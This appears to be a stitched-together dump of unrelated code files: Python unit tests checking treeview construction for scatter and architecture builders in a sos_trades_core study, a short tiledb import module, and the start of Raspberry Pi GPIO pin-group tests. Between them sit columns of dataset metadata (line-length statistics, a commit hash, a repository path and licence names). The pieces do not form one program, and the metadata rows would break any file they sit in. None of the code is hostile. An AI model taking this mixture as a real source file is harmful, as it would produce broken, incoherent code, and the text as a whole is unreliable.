    # Airbus carries AC1/AC2, Boeing carries AC3.
    activation_df = pd.DataFrame(
        {'Actor_list': ['Airbus', 'Airbus', 'Boeing'],
         'Business': [True, True, True],
         'AC_list': ['AC1', 'AC2', 'AC3'],
         'Flight Hour': [True, True, True]})
    self.exec_eng.load_study_from_input_dict(
        {'MyCase.Business.activation_df': activation_df})
    exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
                   f'|_ {self.namespace}',
                   f'\t|_ {vb_builder_name}',
                   '\t\t|_ Actors',
                   '\t\t\t|_ Airbus',
                   '\t\t\t\t|_ Flight Hour',
                   '\t\t\t\t\t|_ AC1',
                   '\t\t\t\t\t|_ AC2',
                   '\t\t\t|_ Boeing',
                   '\t\t\t\t|_ Flight Hour',
                   '\t\t\t\t\t|_ AC3', ]
    exp_tv_str = '\n'.join(exp_tv_list)
    assert exp_tv_str == self.exec_eng.display_treeview_nodes()
def test_09_build_scatter_of_architecture(self):
    """
    Check that an architecture builder nested under a scatter of actors is
    built once per actor, and that changing the scattered actor list cleans
    and rebuilds the architecture accordingly.
    """
    # Build map driving the scatter on the actor list.
    scatter_map = {'input_name': 'actors_list',
                   'input_type': 'string_list',
                   'input_ns': 'ns_actors',
                   'output_name': 'ac_name',
                   'scatter_ns': 'ns_ac'}  # or object ScatterMapBuild
    self.exec_eng.smaps_manager.add_build_map('actors_list', scatter_map)
    self.exec_eng.ns_manager.add_ns('ns_actors', 'MyCase')

    # Two-level architecture: Services -> {Flight Hour -> FHS, Maintenance -> OSS}.
    architecture_df = pd.DataFrame(
        {'Parent': ['Flight Hour', 'Maintenance', 'Services', 'Services'],
         'Current': ['FHS', 'OSS', 'Flight Hour', 'Maintenance'],
         'Type': ['SumValueBlockDiscipline'] * 4,
         'Action': ['standard'] * 4,
         'Activation': [False, False, True, True]})
    arch_builder = self.factory.create_architecture_builder(
        'Services', architecture_df)
    scatter_builder = self.exec_eng.factory.create_scatter_builder(
        'Business', 'actors_list', [arch_builder])
    self.exec_eng.factory.set_builders_to_coupling_builder(scatter_builder)

    # All shared namespaces point at the study root except the business ones.
    ns_dict = {ns: self.study_name
               for ns in ('ns_vbdict', 'ns_public', 'ns_segment_services',
                          'ns_services', 'ns_services_ac', 'ns_seg', 'ns_ac',
                          'ns_coc', 'ns_data_ac', 'ns_business_ac', 'ns_rc',
                          'ns_market', 'ns_market_in')}
    ns_dict['ns_business'] = f'{self.study_name}.Business'
    ns_dict['ns_Airbus'] = f'{self.study_name}.Business.Airbus'
    ns_dict['ns_Boeing'] = f'{self.study_name}.Business.Boeing'
    self.exec_eng.ns_manager.add_ns_def(ns_dict)
    self.exec_eng.configure()

    def node(depth, label):
        # One treeview row: <depth> tabs then the node label.
        return '\t' * depth + '|_ ' + label

    def expected_view(actors):
        # Treeview header followed by one identical subtree per actor.
        rows = [f'Nodes representation for Treeview {self.namespace}',
                f'|_ {self.namespace}',
                node(1, 'Business')]
        for actor in actors:
            rows += [node(2, actor),
                     node(3, 'Services'),
                     node(4, 'Flight Hour'),
                     node(5, 'FHS'),
                     node(4, 'Maintenance'),
                     node(5, 'OSS')]
        return '\n'.join(rows)

    # Swap the actor list three times; each swap must clean the old subtrees.
    scenarios = [
        (['Airbus', 'Boeing'], "with Boeing and Airbus as actors"),
        (['Airbus', 'Embraer'], "Deleting Boeing and inserting Embraer"),
        (['Comac', 'ATR'], "Deleting Embraer and Airbus and inserting Comac and ATR")]
    for actors, message in scenarios:
        self.exec_eng.load_study_from_input_dict(
            {f'{self.study_name}.actors_list': actors})
        print(message)
        print(self.exec_eng.display_treeview_nodes())
        self.assertEqual(expected_view(actors),
                         self.exec_eng.display_treeview_nodes())
def test_10_build_scatter_of_architecture_with_sub_architecture(self):
    """
    Check that an architecture embedding a sub-architecture (via the
    'architecture' action) can be built under a scatter of actors, and that
    the scatter cleans and rebuilds the whole tree when the actor list changes.
    """
    scatter_map = {'input_name': 'actors_list',
                   'input_type': 'string_list',
                   'input_ns': 'ns_actors',
                   'output_name': 'ac_name',
                   'scatter_ns': 'ns_ac'}  # or object ScatterMapBuild
    self.exec_eng.smaps_manager.add_build_map('actors_list', scatter_map)
    self.exec_eng.ns_manager.add_ns('ns_actors', 'MyCase')

    # Sub-architecture hooked below 'Services' through the 'architecture' action.
    sub_architecture_df = pd.DataFrame(
        {'Parent': ['Services', 'Services', 'Flight Hour', 'Maintenance'],
         'Current': ['Flight Hour', 'Maintenance', 'FHS', 'OSS'],
         'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline',
                  'ValueBlockDiscipline', 'ValueBlockDiscipline'],
         'Action': ['standard'] * 4,
         'Activation': [False] * 4})
    architecture_df = pd.DataFrame(
        {'Parent': ['Business', 'Business', 'First_Node', 'Second_Node'],
         'Current': ['First_Node', 'Second_Node', 'Services', 'AC_Sales'],
         'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline',
                  'ValueBlockDiscipline', 'ValueBlockDiscipline'],
         'Action': ['standard', 'standard',
                    ('architecture', sub_architecture_df), 'standard'],
         'Activation': [True, True, False, False]})
    arch_builder = self.factory.create_architecture_builder(
        'Business', architecture_df)
    scatter_builder = self.exec_eng.factory.create_scatter_builder(
        'Scatter', 'actors_list', [arch_builder])
    self.exec_eng.factory.set_builders_to_coupling_builder(scatter_builder)

    ns_dict = {ns: self.study_name
               for ns in ('ns_vbdict', 'ns_public', 'ns_segment_services',
                          'ns_services', 'ns_services_ac', 'ns_seg', 'ns_ac',
                          'ns_coc', 'ns_data_ac', 'ns_business_ac', 'ns_rc',
                          'ns_market', 'ns_market_in')}
    ns_dict['ns_business'] = f'{self.study_name}.Business'
    ns_dict['ns_Airbus'] = f'{self.study_name}.Business.Airbus'
    ns_dict['ns_Boeing'] = f'{self.study_name}.Business.Boeing'
    self.exec_eng.ns_manager.add_ns_def(ns_dict)
    self.exec_eng.configure()

    def node(depth, label):
        # One treeview row: <depth> tabs then the node label.
        return '\t' * depth + '|_ ' + label

    def expected_view(actors):
        rows = [f'Nodes representation for Treeview {self.namespace}',
                f'|_ {self.namespace}',
                node(1, 'Scatter')]
        for actor in actors:
            rows += [node(2, actor),
                     node(3, 'Business'),
                     node(4, 'First_Node'),
                     node(5, 'Services'),
                     node(6, 'Flight Hour'),
                     node(7, 'FHS'),
                     node(6, 'Maintenance'),
                     node(7, 'OSS'),
                     node(4, 'Second_Node'),
                     node(5, 'AC_Sales')]
        return '\n'.join(rows)

    dict_values = {f'{self.study_name}.actors_list': ['Airbus', 'Boeing']}
    self.exec_eng.load_study_from_input_dict(dict_values)
    # NOTE(review): the original test loads the same dict twice (exercising a
    # second configure pass); kept as-is to preserve behavior.
    self.exec_eng.load_study_from_input_dict(dict_values)
    print("with Boeing and Airbus as actors")
    self.assertEqual(expected_view(['Airbus', 'Boeing']),
                     self.exec_eng.display_treeview_nodes())
    print(self.exec_eng.display_treeview_nodes())

    self.exec_eng.load_study_from_input_dict(
        {f'{self.study_name}.actors_list': ['Airbus', 'Embraer']})
    print("Deleting Boeing and inserting Embraer")
    self.assertEqual(expected_view(['Airbus', 'Embraer']),
                     self.exec_eng.display_treeview_nodes())
    print(self.exec_eng.display_treeview_nodes())
def test_11_build_scatter_of_architecture_with_sub_architecture_from_process(self):
    """
    Build the 'test_scatter_architecture' process: a scatter of actors, each
    carrying a services architecture scattered on aircraft and subsystems.
    Check the treeview after swapping actors and after configuring the new
    actor's activation_df (an actor without activation_df only shows bare
    service nodes with no aircraft children).
    """
    def node(depth, label):
        # One treeview row: <depth> tabs then the node label.
        return '\t' * depth + '|_ ' + label

    def aircraft_rows(depth):
        # NSA-300 / NSA-400, each split into Airframe and Propulsion.
        rows = []
        for aircraft in ('NSA-300', 'NSA-400'):
            rows.append(node(depth, aircraft))
            rows += [node(depth + 1, part)
                     for part in ('Airframe', 'Propulsion')]
        return rows

    def full_actor_rows(actor):
        # Fully-activated actor: every service and Sales carry the AC breakdown.
        rows = [node(2, actor), node(3, 'Services')]
        for service in ('OSS', 'FHS', 'Pool', 'TSP'):
            rows.append(node(4, service))
            rows += aircraft_rows(5)
        rows.append(node(3, 'Sales'))
        rows += aircraft_rows(4)
        return rows

    def bare_actor_rows(actor):
        # Actor without activation_df: service nodes exist but have no children.
        rows = [node(2, actor), node(3, 'Services')]
        rows += [node(4, service) for service in ('OSS', 'FHS', 'Pool', 'TSP')]
        rows.append(node(3, 'Sales'))
        return rows

    def expected_view(*actor_blocks):
        rows = [f'Nodes representation for Treeview {self.namespace}',
                f'|_ {self.namespace}',
                node(1, 'Business')]
        for block in actor_blocks:
            rows += block
        return '\n'.join(rows)

    builder_process = self.exec_eng.factory.get_builder_from_process(
        'sos_trades_core.sos_processes.test', 'test_scatter_architecture')
    self.exec_eng.factory.set_builders_to_coupling_builder(builder_process)
    self.exec_eng.configure()

    all_on = [True] * 4
    activ_df = pd.DataFrame(
        {'AC_list': ['NSA-300', 'NSA-300', 'NSA-400', 'NSA-400'],
         'subsystem_list': ['Airframe', 'Propulsion', 'Airframe', 'Propulsion'],
         'OSS': all_on, 'FHS': all_on, 'Pool': all_on,
         'TSP': all_on, 'Sales': all_on})
    self.exec_eng.load_study_from_input_dict(
        {f'{self.study_name}.Business.actors_list': ['Airbus', 'Boeing'],
         f'{self.study_name}.Business.Airbus.activation_df': activ_df,
         f'{self.study_name}.Business.Boeing.activation_df': activ_df})
    print("with Boeing and Airbus as actors")
    assert expected_view(full_actor_rows('Airbus'),
                         full_actor_rows('Boeing')) == \
        self.exec_eng.display_treeview_nodes()

    self.exec_eng.load_study_from_input_dict(
        {f'{self.study_name}.Business.actors_list': ['Airbus', 'Embraer']})
    print("Deleting Boeing and inserting Embraer")
    # Embraer has no activation_df yet, so its services stay childless.
    expected = expected_view(full_actor_rows('Airbus'),
                             bare_actor_rows('Embraer'))
    print(self.exec_eng.display_treeview_nodes())
    assert expected == self.exec_eng.display_treeview_nodes()

    self.exec_eng.load_study_from_input_dict(
        {f'{self.study_name}.Business.Embraer.activation_df': activ_df})
    # NOTE(review): message reused verbatim from the previous step in the
    # original test; this step actually configures Embraer's activation_df.
    print("Deleting Boeing and inserting Embraer")
    expected = expected_view(full_actor_rows('Airbus'),
                             full_actor_rows('Embraer'))
    print(self.exec_eng.display_treeview_nodes())
    assert expected == self.exec_eng.display_treeview_nodes()
def _test_12_build_scatter_of_sub_architecture_and_scatter(self):
    """
    Disabled test (leading underscore keeps it out of the runner): scatter of
    an architecture whose sub-architecture itself scatters FHS on an aircraft
    list. The treeview assertions are deliberately commented out; the method
    only exercises the build/clean sequence and prints the resulting trees.
    """
    actors_map = {'input_name': 'actors_list',
                  'input_type': 'string_list',
                  'input_ns': 'ns_actors',
                  'output_name': 'ac_name',
                  'scatter_ns': 'ns_ac'}  # or object ScatterMapBuild
    aircrafts_map = {'input_name': 'aircrafts_list',
                     'input_type': 'string_list',
                     'input_ns': 'ns_aircrafts',
                     'output_name': 'ac_name',
                     'scatter_ns': 'ns_ac'}
    self.exec_eng.smaps_manager.add_build_map('actors_list', actors_map)
    self.exec_eng.smaps_manager.add_build_map('aircrafts_list', aircrafts_map)
    self.exec_eng.ns_manager.add_ns('ns_actors', 'MyCase')
    self.exec_eng.ns_manager.add_ns('ns_aircrafts', 'MyCase')

    # FHS is itself scattered on the aircrafts list inside the sub-architecture.
    sub_architecture_df = pd.DataFrame(
        {'Parent': ['Services', 'Services', 'Flight Hour', 'Maintenance'],
         'Current': ['Flight Hour', 'Maintenance', 'FHS', 'OSS'],
         'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline',
                  'ValueBlockDiscipline', 'ValueBlockDiscipline'],
         'Action': ['standard', 'standard',
                    ('scatter', 'aircrafts_list', 'ValueBlockDiscipline'),
                    'standard'],
         'Activation': [False] * 4})
    architecture_df = pd.DataFrame(
        {'Parent': ['Business', 'Business', 'First_Node', 'Second_Node'],
         'Current': ['First_Node', 'Second_Node', 'Services', 'AC_Sales'],
         'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline',
                  'ValueBlockDiscipline', 'ValueBlockDiscipline'],
         'Action': ['standard', 'standard',
                    ('architecture', sub_architecture_df), 'standard'],
         'Activation': [True, True, False, False]})
    arch_builder = self.factory.create_architecture_builder(
        'Business', architecture_df)
    scatter_builder = self.exec_eng.factory.create_scatter_builder(
        'Scatter', 'actors_list', [arch_builder])
    self.exec_eng.factory.set_builders_to_coupling_builder(scatter_builder)

    ns_dict = {ns: self.study_name
               for ns in ('ns_vbdict', 'ns_public', 'ns_segment_services',
                          'ns_services', 'ns_services_ac', 'ns_seg', 'ns_ac',
                          'ns_coc', 'ns_data_ac', 'ns_business_ac', 'ns_rc',
                          'ns_market', 'ns_market_in')}
    ns_dict['ns_business'] = f'{self.study_name}.Business'
    ns_dict['ns_Airbus'] = f'{self.study_name}.Business.Airbus'
    ns_dict['ns_Boeing'] = f'{self.study_name}.Business.Boeing'
    self.exec_eng.ns_manager.add_ns_def(ns_dict)
    self.exec_eng.configure()

    def node(depth, label):
        # One treeview row: <depth> tabs then the node label.
        return '\t' * depth + '|_ ' + label

    def expected_view(actors):
        # Expected layout WITHOUT the aircraft scatter below FHS — this is
        # why the assertions below are still disabled.
        rows = [f'Nodes representation for Treeview {self.namespace}',
                f'|_ {self.namespace}',
                node(1, 'Scatter')]
        for actor in actors:
            rows += [node(2, actor),
                     node(3, 'Business'),
                     node(4, 'First_Node'),
                     node(5, 'Services'),
                     node(6, 'Flight Hour'),
                     node(7, 'FHS'),
                     node(6, 'Maintenance'),
                     node(7, 'OSS'),
                     node(4, 'Second_Node'),
                     node(5, 'AC_Sales')]
        return '\n'.join(rows)

    self.exec_eng.load_study_from_input_dict(
        {f'{self.study_name}.actors_list': ['Airbus', 'Boeing']})
    self.exec_eng.load_study_from_input_dict(
        {f'{self.study_name}.aircrafts_list': ['AC1', 'AC2', 'AC3']})
    print("with Boeing and Airbus as actors")
    initial_tree_view = expected_view(['Airbus', 'Boeing'])
    # Assertion disabled until the treeview matches the expected layout:
    # self.assertEqual(initial_tree_view, self.exec_eng.display_treeview_nodes())
    print(self.exec_eng.display_treeview_nodes())

    self.exec_eng.load_study_from_input_dict(
        {f'{self.study_name}.actors_list': ['Airbus', 'Embraer']})
    print("Deleting Boeing and inserting Embraer")
    second_tree_view = expected_view(['Airbus', 'Embraer'])
    # self.assertEqual(second_tree_view, self.exec_eng.display_treeview_nodes())
    print(self.exec_eng.display_treeview_nodes())
def test_13_build_scatter_of_architecture_without_father_and_with_sum_value_block(self):
    """
    Check that a '@root_node@' row in architecture_df builds a sum value
    block directly at each actor node of the scatter, and that after
    execution this root block gathers its children's outputs per actor.
    """
    scatter_map = {'input_name': 'actors_list',
                   'input_type': 'string_list',
                   'input_ns': 'ns_actors',
                   'output_name': 'ac_name',
                   'scatter_ns': 'ns_ac'}  # or object ScatterMapBuild
    self.exec_eng.smaps_manager.add_build_map('actors_list', scatter_map)
    self.exec_eng.ns_manager.add_ns('ns_actors', 'MyCase')

    # '@root_node@' places the SumValueBlockDiscipline at the actor node itself.
    architecture_df = pd.DataFrame(
        {'Parent': ['Flight Hour', 'Maintenance', None, None, None],
         'Current': ['FHS', 'OSS', 'Flight Hour', 'Maintenance', '@root_node@'],
         'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline',
                  'FakeValueBlockDiscipline', 'FakeValueBlockDiscipline',
                  'SumValueBlockDiscipline'],
         'Action': ['standard'] * 5,
         'Activation': [False, False, True, True, False]})
    arch_builder = self.factory.create_architecture_builder(
        'Business', architecture_df)
    # NOTE(review): the architecture builder is passed directly here (not
    # wrapped in a list as in the other tests) — kept as-is.
    scatter_builder = self.exec_eng.factory.create_scatter_builder(
        'Business', 'actors_list', arch_builder)
    self.exec_eng.factory.set_builders_to_coupling_builder(scatter_builder)

    ns_dict = {ns: self.study_name
               for ns in ('ns_vbdict', 'ns_public', 'ns_segment_services',
                          'ns_services', 'ns_services_ac', 'ns_seg', 'ns_ac',
                          'ns_coc', 'ns_data_ac', 'ns_business_ac', 'ns_rc',
                          'ns_market', 'ns_market_in')}
    ns_dict['ns_business'] = f'{self.study_name}.Business'
    ns_dict['ns_Airbus'] = f'{self.study_name}.Business.Airbus'
    ns_dict['ns_Boeing'] = f'{self.study_name}.Business.Boeing'
    self.exec_eng.ns_manager.add_ns_def(ns_dict)
    self.exec_eng.configure()

    def node(depth, label):
        # One treeview row: <depth> tabs then the node label.
        return '\t' * depth + '|_ ' + label

    def expected_view(actors):
        # No intermediate node below each actor: the root block is the actor node.
        rows = [f'Nodes representation for Treeview {self.namespace}',
                f'|_ {self.namespace}',
                node(1, 'Business')]
        for actor in actors:
            rows += [node(2, actor),
                     node(3, 'Flight Hour'),
                     node(4, 'FHS'),
                     node(3, 'Maintenance'),
                     node(4, 'OSS')]
        return '\n'.join(rows)

    def check_gather(actor):
        # The root-node sum block must gather its children's outputs.
        get_value = self.exec_eng.dm.get_value
        expected = {
            'Flight Hour': get_value(
                f'MyCase.Business.{actor}.Flight Hour.output'),
            'Maintenance': get_value(
                f'MyCase.Business.{actor}.Maintenance.output')}
        self.assertDictEqual(
            get_value(f'MyCase.Business.{actor}.output_gather'), expected)

    self.exec_eng.load_study_from_input_dict(
        {f'{self.study_name}.actors_list': ['Airbus', 'Boeing']})
    print("with Boeing and Airbus as actors")
    print(self.exec_eng.display_treeview_nodes())
    self.assertEqual(expected_view(['Airbus', 'Boeing']),
                     self.exec_eng.display_treeview_nodes())
    self.exec_eng.execute()
    check_gather('Airbus')
    check_gather('Boeing')

    self.exec_eng.load_study_from_input_dict(
        {f'{self.study_name}.actors_list': ['Airbus', 'Embraer']})
    print("Deleting Boeing and inserting Embraer")
    self.assertEqual(expected_view(['Airbus', 'Embraer']),
                     self.exec_eng.display_treeview_nodes())
    self.exec_eng.execute()
    check_gather('Airbus')
    check_gather('Embraer')
def test_14_build_scatter_of_sub_architecture_with_process_with_root_node(self):
    """
    Reproduce the APDS-like process with a '@root_node@': check the treeview
    and that a ValueBlockDiscipline is built directly at each actor node.
    Also check that deactivating every 'Sales' row for one actor removes the
    Sales subtree and empties that actor-node block's children list.
    """
    def node(depth, label):
        # One treeview row: <depth> tabs then the node label.
        return '\t' * depth + '|_ ' + label

    def aircraft_rows(depth):
        # NSA-300 / NSA-400, each split into Airframe and Propulsion.
        rows = []
        for aircraft in ('NSA-300', 'NSA-400'):
            rows.append(node(depth, aircraft))
            rows += [node(depth + 1, part)
                     for part in ('Airframe', 'Propulsion')]
        return rows

    def actor_rows(actor, with_sales=True):
        # Actor subtree; Sales branch omitted when deactivated.
        rows = [node(2, actor), node(3, 'Services')]
        for service in ('OSS', 'FHS', 'Pool', 'TSP'):
            rows.append(node(4, service))
            rows += aircraft_rows(5)
        if with_sales:
            rows.append(node(3, 'Sales'))
            rows += aircraft_rows(4)
        return rows

    def expected_view(*actor_blocks):
        rows = [f'Nodes representation for Treeview {self.namespace}',
                f'|_ {self.namespace}',
                node(1, 'Business')]
        for block in actor_blocks:
            rows += block
        return '\n'.join(rows)

    builder_process = self.exec_eng.factory.get_builder_from_process(
        'sos_trades_core.sos_processes.test',
        'test_scatter_architecture_with_root')
    self.exec_eng.factory.set_builders_to_coupling_builder(builder_process)
    self.exec_eng.load_study_from_input_dict({})

    all_on = [True] * 4
    activ_df = pd.DataFrame(
        {'AC_list': ['NSA-300', 'NSA-300', 'NSA-400', 'NSA-400'],
         'subsystem_list': ['Airframe', 'Propulsion', 'Airframe', 'Propulsion'],
         'OSS': all_on, 'FHS': all_on, 'Pool': all_on,
         'TSP': all_on, 'Sales': all_on})
    self.exec_eng.load_study_from_input_dict(
        {f'{self.study_name}.Business.actors_list': ['Airbus', 'Boeing'],
         f'{self.study_name}.Business.Airbus.activation_df': activ_df,
         f'{self.study_name}.Business.Boeing.activation_df': activ_df})
    print("with Boeing and Airbus as actors")
    expected = expected_view(actor_rows('Airbus'), actor_rows('Boeing'))
    # The block at each actor node must be a ValueBlockDiscipline.
    self.assertTrue(isinstance(
        self.exec_eng.dm.get_disciplines_with_name('MyCase.Business.Airbus')[1],
        ValueBlockDiscipline))
    self.assertTrue(isinstance(
        self.exec_eng.dm.get_disciplines_with_name('MyCase.Business.Boeing')[1],
        ValueBlockDiscipline))
    assert expected == self.exec_eng.display_treeview_nodes()

    self.exec_eng.load_study_from_input_dict(
        {f'{self.study_name}.Business.actors_list': ['Airbus', 'Embraer'],
         f'{self.study_name}.Business.Airbus.activation_df': activ_df,
         f'{self.study_name}.Business.Embraer.activation_df': activ_df})
    print("Deleting Boeing and inserting Embraer")
    expected = expected_view(actor_rows('Airbus'), actor_rows('Embraer'))
    assert expected == self.exec_eng.display_treeview_nodes()
    self.assertTrue(isinstance(
        self.exec_eng.dm.get_disciplines_with_name('MyCase.Business.Embraer')[1],
        ValueBlockDiscipline))

    print(" deactivating sales in embraer")
    embraer_activ_df = pd.DataFrame(
        {'AC_list': ['NSA-300', 'NSA-300', 'NSA-400', 'NSA-400'],
         'subsystem_list': ['Airframe', 'Propulsion', 'Airframe', 'Propulsion'],
         'OSS': all_on, 'FHS': all_on, 'Pool': all_on,
         'TSP': all_on, 'Sales': [False] * 4})
    self.exec_eng.load_study_from_input_dict(
        {f'{self.study_name}.Business.Embraer.activation_df': embraer_activ_df})
    print(self.exec_eng.display_treeview_nodes())
    expected = expected_view(actor_rows('Airbus'),
                             actor_rows('Embraer', with_sales=False))
    assert expected == self.exec_eng.display_treeview_nodes()
    # Sales fully deactivated: the Embraer root value block has no children left.
    assert (self.exec_eng.dm.get_disciplines_with_name(
        'MyCase.Business.Embraer')[1]).children_list == []
| 51.046448
| 119
| 0.448782
| 10,354
| 93,415
| 3.787811
| 0.029747
| 0.121982
| 0.134017
| 0.118004
| 0.915398
| 0.908463
| 0.89704
| 0.889467
| 0.877687
| 0.866697
| 0
| 0.009239
| 0.416057
| 93,415
| 1,829
| 120
| 51.074358
| 0.709729
| 0.032008
| 0
| 0.894103
| 0
| 0
| 0.309846
| 0.049471
| 0
| 0
| 0
| 0
| 0.029803
| 1
| 0.009512
| false
| 0
| 0.003805
| 0
| 0.013951
| 0.017121
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8e6ed55d2a250e214a22a87b1299373cd6c466c0
| 194
|
py
|
Python
|
tiledb/cloud/compute/__init__.py
|
TileDB-Inc/TileDB-Cloud-Py
|
e73f6e0ae3fc595218abd3be606c68f62ad5ac9b
|
[
"MIT"
] | 4
|
2019-12-04T23:19:35.000Z
|
2021-06-21T21:42:53.000Z
|
tiledb/cloud/compute/__init__.py
|
TileDB-Inc/TileDB-Cloud-Py
|
e73f6e0ae3fc595218abd3be606c68f62ad5ac9b
|
[
"MIT"
] | 106
|
2019-11-07T22:40:43.000Z
|
2022-03-29T22:31:18.000Z
|
tiledb/cloud/compute/__init__.py
|
TileDB-Inc/TileDB-Cloud-Py
|
e73f6e0ae3fc595218abd3be606c68f62ad5ac9b
|
[
"MIT"
] | 1
|
2020-10-04T18:54:37.000Z
|
2020-10-04T18:54:37.000Z
|
from tiledb.cloud.compute.delayed import Delayed
from tiledb.cloud.compute.delayed import DelayedArrayUDF
from tiledb.cloud.compute.delayed import DelayedSQL
from tiledb.cloud.dag import Status
| 38.8
| 56
| 0.860825
| 27
| 194
| 6.185185
| 0.37037
| 0.239521
| 0.359281
| 0.39521
| 0.628743
| 0.628743
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082474
| 194
| 4
| 57
| 48.5
| 0.938202
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8eb492ce87fbfbfa180a1591cf3abefc4581088c
| 37,697
|
py
|
Python
|
dibase/rpi/gpio/test/pingroup-platformtests.py
|
ralph-mcardell/dibase-rpi-python
|
724c18d1f3c6745b3dddf582ea2272ed4e2df8ac
|
[
"BSD-3-Clause"
] | null | null | null |
dibase/rpi/gpio/test/pingroup-platformtests.py
|
ralph-mcardell/dibase-rpi-python
|
724c18d1f3c6745b3dddf582ea2272ed4e2df8ac
|
[
"BSD-3-Clause"
] | null | null | null |
dibase/rpi/gpio/test/pingroup-platformtests.py
|
ralph-mcardell/dibase-rpi-python
|
724c18d1f3c6745b3dddf582ea2272ed4e2df8ac
|
[
"BSD-3-Clause"
] | null | null | null |
'''
Part of the dibase.rpi.gpio.test package.
Platform tests on read/write operations on GPIO pin group
IO type instances.
Developed by R.E. McArdell / Dibase Limited.
Copyright (c) 2012 Dibase Limited
License: dual: GPL or BSD.
'''
import collections
import time
import unittest
import sys
if __name__ == '__main__':
# Add path to directory containing the dibase package directory
sys.path.insert(0, './../../../..')
from dibase.rpi.gpio import pingroup
from dibase.rpi.gpio.pin import force_free_pin
from dibase.rpi.gpio.pinid import RPiPinIdSet
from dibase.rpi.gpio import gpioerror as error
class OpenPinGroupFunctionPlatformTests(unittest.TestCase):
def tearDown(self):
cleaned_up = []
for v in RPiPinIdSet.valid_ids(pingroup.PinId._get_rpi_major_revision_index()):
id = force_free_pin(pingroup.PinId.gpio(v))
if (id!=None):
cleaned_up.append(id)
if ( cleaned_up != [] ):
print "\nCleaned up left over exports for pins", cleaned_up
self.assertEqual(cleaned_up,[])
def test_open_pins_for_writing_bad_blocking_mode_fails(self):
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'w#I')
def test_open_pins_for_writing_bad_format_mode_fails(self):
with self.assertRaises( error.PinGroupFormatModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wN#')
def test_open_pins_for_writing_bad_blocking_or_format_mode_fails(self):
with self.assertRaises( error.PinGroupOpenModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'w#')
def test_open_pin_for_writing_creates_PinWordWriter(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'w'),pingroup.PinWordWriter)
def test_open_pin_for_writing_nonblocking_mode_creates_PinWordWriter(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wN'),pingroup.PinWordWriter)
def test_open_pin_for_writing_integer_mode_creates_PinWordWriter(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wI'),pingroup.PinWordWriter)
def test_open_pin_for_writing_noblocking_integer_mode_creates_PinWordWriter(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wNI'),pingroup.PinWordWriter)
def test_open_pin_for_writing_sequence_mode_creates_PinListWriter(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wS'),pingroup.PinListWriter)
def test_open_pin_for_writing_nonblocking_sequence_mode_creates_PinListWriter(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wNS'),pingroup.PinListWriter)
def test_open_pins_for_writing_some_blocking_mode_fails(self):
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wRI')
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wFS')
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wBI')
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wR')
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wF')
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wB')
def test_open_pins_for_reading_bad_blocking_mode_fails(self):
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rXS')
def test_open_pins_for_reading_bad_format_mode_fails(self):
with self.assertRaises( error.PinGroupFormatModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rBX')
def test_open_pins_for_reading_bad_blocking_or_format_mode_fails(self):
with self.assertRaises( error.PinGroupOpenModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'r#')
def test_open_pins_bad_rw_mode_fails(self):
with self.assertRaises( error.PinDirectionModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'a')
def test_open_pins_bad_mode_string_fails(self):
with self.assertRaises( error.PinGroupOpenModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rNS+')
def test_open_pin_for_reading_creates_PinWordReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'r'),pingroup.PinWordReader)
def test_open_pin_for_reading_nonblocking_mode_creates_creates_PinWordReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rN'),pingroup.PinWordReader)
